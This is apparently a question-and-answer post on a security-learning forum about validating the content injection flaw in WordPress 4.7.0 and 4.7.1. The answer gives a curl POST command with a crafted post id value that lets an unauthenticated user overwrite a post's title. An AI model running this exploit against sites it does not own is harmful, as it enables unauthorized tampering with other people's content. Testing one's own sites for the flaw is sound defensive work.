Techbypass always tries to help you to learn about recent vulnerabilities and exploitations.

Learn and share your security findings and help others to secure their digital assets.

0 votes
The WordPress version 4.7.0 and 4.7.1 are vulnerable to Content Injection. How can I validate the vulnerability?
by (169 points)

1 Answer

0 votes

Through this vulnerability, an unauthenticated user can modify the content of any post or page. Lets the post id is 1 and you can change the title using this Curl command.

curl '' -X 'POST' -F 'id=1changecontent' -F 'title=Codeshikari' 

If your site is vulnerable then the title of the post id 1 will change to "Codeshikari".

by (230 points)